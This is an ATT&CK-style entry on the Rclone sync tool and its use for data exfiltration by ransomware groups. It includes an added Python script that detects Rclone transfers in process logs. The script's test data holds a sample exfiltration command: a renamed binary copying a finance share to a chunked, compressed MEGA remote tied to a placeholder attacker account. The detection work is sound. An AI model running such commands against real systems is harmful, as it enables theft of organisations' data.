Rclone

Rclone is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.[1][2][3][4][5]

ID: S1040
Type: TOOL
Platforms: Linux, Windows, macOS
Contributors: Edward Millington; Ian McKay
Version: 1.1
Created: 30 August 2022
Last Modified: 04 April 2024

Techniques Used

Domain      ID         Name / Use
Enterprise  T1560.001  Archive Collected Data: Archive via Utility
            Use: Rclone can compress files using gzip prior to exfiltration.[1]

Enterprise  T1030      Data Transfer Size Limits
            Use: The Rclone "chunker" overlay splits large files into smaller chunks during upload, which can be used to circumvent a destination's file-size limits.[1][5]

Enterprise  T1048.002  Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Use: Rclone can exfiltrate data over SFTP, or over HTTPS via WebDAV.[1]

Enterprise  T1048.003  Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
            Use: Rclone can exfiltrate data over FTP or HTTP, including HTTP via WebDAV.[1]

Enterprise  T1567.002  Exfiltration Over Web Service: Exfiltration to Cloud Storage
            Use: Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.[1][5]

Enterprise  T1083      File and Directory Discovery
            Use: Rclone can list files and directories on a remote with the ls, lsd, and lsl commands.[1]
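The rows above map cleanly onto two artifacts a responder actually has: the rclone.conf the operator dropped and the process-creation record of the transfer. The script below is an added example by the editor, not ATT&CK or rclone project code. It parses a constructed rclone.conf (placeholder credentials, TEST-NET addresses), follows chunker/compress overlays via their "remote =" key down to the real backend, and tags each remote with the technique ID from the table (chunker → T1030, gzip compress → T1560.001, mega/s3/drive/dropbox and similar → T1567.002, sftp or https WebDAV → T1048.002, ftp or http WebDAV → T1048.003, ls/lsd/lsl/lsf/lsjson → T1083). It then runs over constructed tab-separated records of the form "<timestamp>\t<image>\t<command line>". The command and flag names are a subset of real rclone ones; the backend-type-to-technique mapping, the log format and the sample data are the editor's assumptions.

```python
"""Editor's triage example for the Techniques Used table: find rclone-style
transfers/listings in process-creation records and map the destination
remote (through chunker/compress overlays) to ATT&CK technique IDs.

Assumptions (not from the ATT&CK entry or rclone): records are
"<timestamp>\t<image>\t<command line>"; the config and log are constructed;
the backend-type -> technique mapping is the editor's reading of the table.
"""
import configparser
import re
import shlex

# Constructed rclone.conf in the INI layout rclone writes (placeholder secrets).
SAMPLE_CONF = """
[mega1]
type = mega
user = attacker@example.invalid
pass = obscured-placeholder

[sftpbox]
type = sftp
host = 203.0.113.10
user = upload

[dav-plain]
type = webdav
url = http://198.51.100.7/dav
vendor = other

[dav-tls]
type = webdav
url = https://198.51.100.7/dav
vendor = other

[chunks]
type = chunker
remote = zipped:
chunk_size = 50M

[zipped]
type = compress
remote = mega1:
compression_mode = gzip
"""

# Constructed process-creation records (not real telemetry).
SAMPLE_LOG = "\n".join("\t".join(rec) for rec in [
    ("2024-04-02T03:12:44Z", r"C:\Windows\Temp\svchost.exe",
     r"svchost.exe copy D:\Finance chunks:q1 --config C:\ProgramData\rc.conf "
     r"--transfers 32 --ignore-existing --auto-confirm -q"),
    ("2024-04-02T03:13:01Z", r"C:\Users\bob\rclone.exe", r"rclone.exe lsd sftpbox:/incoming"),
    ("2024-04-02T03:13:20Z", r"C:\Program Files\rclone\rclone.exe",
     r"rclone.exe sync C:\Share dav-plain:dump --bwlimit 10M"),
    ("2024-04-02T03:14:00Z", r"C:\Windows\System32\svchost.exe", r"svchost.exe -k netsvcs -p"),
])

TRANSFER_CMDS = {"copy", "sync", "move", "copyto", "moveto"}
LISTING_CMDS = {"ls", "lsd", "lsl", "lsf", "lsjson"}      # listing a remote -> T1083
# rclone flags that consume the next token when not written as --flag=value.
VALUE_FLAGS = {"--config", "--transfers", "--checkers", "--bwlimit", "--max-age", "--exclude",
               "--include", "--filter-from", "--files-from", "--log-file", "--multi-thread-streams"}
# Flags worth surfacing in a finding (bulk/quiet transfer tuning).
TUNING_FLAGS = {"--transfers", "--checkers", "--multi-thread-streams", "--ignore-existing",
                "--auto-confirm", "--bwlimit", "--no-check-certificate", "-q"}
CLOUD_TYPES = {"mega", "s3", "drive", "dropbox", "b2", "box", "onedrive"}  # rclone backend names
REMOTE_RE = re.compile(r"^([A-Za-z0-9_][\w.-]+):")  # two+ chars, so C:\path is not a remote


def load_conf(text):
    """Parse rclone.conf into {remote_name: {key: value}}."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    cp.read_string(text)
    return {name: dict(cp[name]) for name in cp.sections()}


def technique_for(kind, sect):
    """Editor's mapping of one backend section to the technique ID in the table."""
    if kind == "chunker":
        return "T1030"
    if kind == "compress" and sect.get("compression_mode", "gzip") == "gzip":
        return "T1560.001"
    if kind in CLOUD_TYPES:
        return "T1567.002"
    if kind == "sftp":
        return "T1048.002"
    if kind == "ftp":
        return "T1048.003"
    if kind == "webdav":
        return "T1048.002" if sect.get("url", "").lower().startswith("https://") else "T1048.003"
    return None


def resolve_remote(conf, name):
    """Follow chunker/compress overlays (their 'remote =' key) to the real backend.
    Returns (["name:type", ...], {technique IDs})."""
    chain, techs, seen = [], set(), set()
    while name and name not in seen:
        seen.add(name)
        sect = conf.get(name)
        if sect is None:
            chain.append(f"{name}:<not in config>")
            break
        kind = sect.get("type", "")
        chain.append(f"{name}:{kind}")
        tech = technique_for(kind, sect)
        if tech:
            techs.add(tech)
        # Only overlay backends wrap another remote ("zipped:" -> "zipped"); stop otherwise.
        name = sect.get("remote", "").split(":")[0] if kind in ("chunker", "compress") else None
    return chain, techs


def parse_cmdline(cmdline):
    """Return (command, positionals, flags) for an rclone-style command line, else None.
    Keys on argument shape rather than the image name, so a renamed binary still matches."""
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if len(toks) < 2 or toks[1] not in TRANSFER_CMDS | LISTING_CMDS:
        return None
    command, positionals, flags, i = toks[1], [], {}, 2
    while i < len(toks):
        t = toks[i]
        if t.startswith("-"):
            if "=" in t:
                k, v = t.split("=", 1)
                flags[k] = v
            elif t in VALUE_FLAGS and i + 1 < len(toks):
                flags[t] = toks[i + 1]
                i += 1
            else:
                flags[t] = True
        else:
            positionals.append(t)
        i += 1
    if not any(REMOTE_RE.match(p) for p in positionals) and "--config" not in flags:
        return None
    return command, positionals, flags


def triage(log_text, conf):
    """One finding per record that looks like an rclone transfer or listing."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, image, cmdline = line.split("\t", 2)
        parsed = parse_cmdline(cmdline)
        if parsed is None:
            continue
        command, positionals, flags = parsed
        remotes = [m.group(1) for p in positionals if (m := REMOTE_RE.match(p))]
        chain, techs = resolve_remote(conf, remotes[-1]) if remotes else ([], set())
        if command in LISTING_CMDS:      # listing is discovery, not transfer
            techs = {"T1083"}
        findings.append({
            "time": ts,
            "image": image,
            "renamed_binary": re.split(r"[\\/]", image)[-1].lower() not in ("rclone.exe", "rclone"),
            "command": command,
            "remote_chain": chain,
            "techniques": sorted(techs),
            "config": flags.get("--config"),
            "tuning_flags": sorted(k for k in flags if k in TUNING_FLAGS),
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG, load_conf(SAMPLE_CONF)):
        print(finding)
```

The first sample record is the interesting one: the image is a renamed binary in a temp directory, the destination "chunks:" resolves through chunker and gzip compress to a MEGA remote, so one command line yields T1030, T1560.001 and T1567.002 at once. A lsd against the SFTP remote is reported as T1083 only, since listing is not transfer, and the plain-http WebDAV sync lands on T1048.003. Real telemetry will need the record format adjusted, and a remote missing from the recovered config is reported as "<not in config>" rather than guessed.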

Groups That Use This Software

ID     Name              References
G1032  INC Ransom        [6]
G1003  Ember Bear        Ember Bear has used Rclone to exfiltrate information from victim environments.[7]
G1024  Akira             [8]
G1021  Cinnamon Tempest  [9]

Campaigns

ID     Name   Description
C0015  C0015  [5]

References